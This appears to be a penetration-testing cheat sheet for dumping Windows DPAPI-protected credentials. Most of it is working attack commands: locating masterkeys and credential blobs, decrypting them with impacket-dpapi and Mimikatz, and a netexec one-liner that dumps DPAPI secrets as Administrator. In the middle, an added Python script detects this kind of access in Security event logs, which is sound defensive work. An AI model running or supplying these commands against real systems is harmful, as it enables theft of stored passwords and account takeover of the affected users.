DPAPI

Dumping credentials protected by the Windows Data Protection API (DPAPI)

From Low Users

Manual Approach

Locating credential files:

dir /A C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\
dir /A C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\

Locating masterkeys:

dir /A C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\
dir /A C:\Users\yuyudhn\AppData\Local\Microsoft\Protect\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Force C:\Users\yuyudhn\AppData\Local\Microsoft\Protect\

The masterkey files are usually laid out like this, one GUID-named file per masterkey under the user's SID:

C:\Users\$USER\AppData\Roaming\Microsoft\Protect\$SID\$GUID

Copy all credential files and masterkeys to the attacker machine, then extract the credentials with impacket-dpapi.

Decrypt the masterkey:

impacket-dpapi masterkey -file $masterkey -sid $SID -password Password1213!

Or if you have the backup key:

impacket-dpapi masterkey -file $masterkey -sid $SID -pvk key.pvk

Grab credentials:

impacket-dpapi credential -file $credsfile -key $decryptedkey
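The same file layout the manual approach walks through (masterkeys under Protect\$SID\$GUID, credential blobs under Credentials\) is what a defender can watch. The following is an added example, not part of these notes: it assumes object-access auditing with a SACL on those two folders so that 4663 events are produced, and it runs over constructed Security-log records in a simplified dict form (field names follow the Windows event XML). It flags reads of a masterkey or credential blob by a principal other than the profile owner, which is what both the low-privilege copy-out and the administrator-level dump above look like from the owner's side, and it surfaces 4693 (masterkey recovery attempted) for review.

```python
import re
from typing import Optional

# Masterkey files: ...\Microsoft\Protect\<SID>\<GUID>  (GUID without braces)
PROTECT_RE = re.compile(
    r"\\Microsoft\\Protect\\(S-1-5-21-\d+-\d+-\d+-\d+)\\"
    r"([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})$"
)
# Credential blobs: ...\Microsoft\Credentials\<32 hex chars>
CRED_RE = re.compile(r"\\Microsoft\\Credentials\\[0-9A-F]{32}$", re.I)
# Profile owner taken from the C:\Users\<name>\ prefix
PROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\([^\\]+)\\", re.I)

# SIDs that may legitimately touch other users' stores in your telemetry; empty by default,
# tune after baselining (assumption: your environment decides what belongs here).
ALLOWLIST_SIDS: set = set()


def sid_from_protect_path(path: str) -> Optional[str]:
    """Return the owner SID encoded in a Protect\\<SID>\\<GUID> masterkey path, else None."""
    m = PROTECT_RE.search(path)
    return m.group(1) if m else None


def profile_owner(path: str) -> Optional[str]:
    """Return the profile name from a C:\\Users\\<name>\\... path, else None."""
    m = PROFILE_RE.match(path)
    return m.group(1) if m else None


def triage(events):
    """Return a list of findings for DPAPI-store access that does not match the profile owner."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 4693:  # Recovery of data protection master key was attempted
            findings.append({"EventID": eid, "subject": ev.get("SubjectUserName"),
                             "reason": "DPAPI masterkey recovery attempted"})
            continue
        if eid != 4663:  # An attempt was made to access an object
            continue
        path = ev.get("ObjectName", "")
        subj_sid = ev.get("SubjectUserSid", "")
        subj_name = (ev.get("SubjectUserName") or "").lower()
        if subj_sid in ALLOWLIST_SIDS:
            continue
        owner_sid = sid_from_protect_path(path)
        if owner_sid and owner_sid != subj_sid:
            findings.append({"EventID": eid, "subject": ev.get("SubjectUserName"), "object": path,
                             "reason": "masterkey file read by a principal other than its owner"})
        elif CRED_RE.search(path):
            owner = profile_owner(path)
            if owner and owner.lower() != subj_name:
                findings.append({"EventID": eid, "subject": ev.get("SubjectUserName"), "object": path,
                                 "reason": "credential blob read from another user's profile"})
    return findings


# Constructed sample records (SIDs, GUID and blob name are made up for the example)
OWNER_SID = "S-1-5-21-1111-2222-3333-1105"
ADMIN_SID = "S-1-5-21-1111-2222-3333-500"
MK_PATH = (r"C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\%s"
           r"\7d8c9a3b-1e2f-4a5b-9c6d-0e1f2a3b4c5d" % OWNER_SID)
CRED_PATH = r"C:\Users\yuyudhn\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D"

SAMPLE_EVENTS = [
    # owner reading their own masterkey: normal DPAPI use, no finding
    {"EventID": 4663, "SubjectUserSid": OWNER_SID, "SubjectUserName": "yuyudhn",
     "ObjectName": MK_PATH, "AccessMask": "0x1"},
    # local administrator reading another user's masterkey
    {"EventID": 4663, "SubjectUserSid": ADMIN_SID, "SubjectUserName": "Administrator",
     "ObjectName": MK_PATH, "AccessMask": "0x1"},
    # local administrator reading another user's credential blob
    {"EventID": 4663, "SubjectUserSid": ADMIN_SID, "SubjectUserName": "Administrator",
     "ObjectName": CRED_PATH, "AccessMask": "0x1"},
    # unrelated file access, no finding
    {"EventID": 4663, "SubjectUserSid": ADMIN_SID, "SubjectUserName": "Administrator",
     "ObjectName": r"C:\Users\yuyudhn\Documents\notes.txt", "AccessMask": "0x1"},
    # masterkey recovery attempt
    {"EventID": 4693, "SubjectUserSid": ADMIN_SID, "SubjectUserName": "Administrator"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f)
```

The SID comparison for masterkeys is exact because the owning SID is part of the path; the credential-blob check falls back to the profile folder name, which is a heuristic and will need tuning where profile names and account names differ. Event 4693 is rare in normal operation, whereas 4692 (masterkey backup) fires routinely when a new masterkey is created, so only 4693 is surfaced here.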

Mimikatz

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\yuyudhn\AppData\Roaming\Microsoft\Protect\$SID\$GUID /sid:$SID /password:Password1337 /protected" "exit"'
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\yuyudhn\AppData\Roaming\Microsoft\Credentials\$credsfile /masterkey:$decryptedkey" "exit"'

From Administrator

netexec smb target.local -u Administrator -p Password123 --local-auth --dpapi

Other tools

DonPAPI
dploot
SharpDPAPI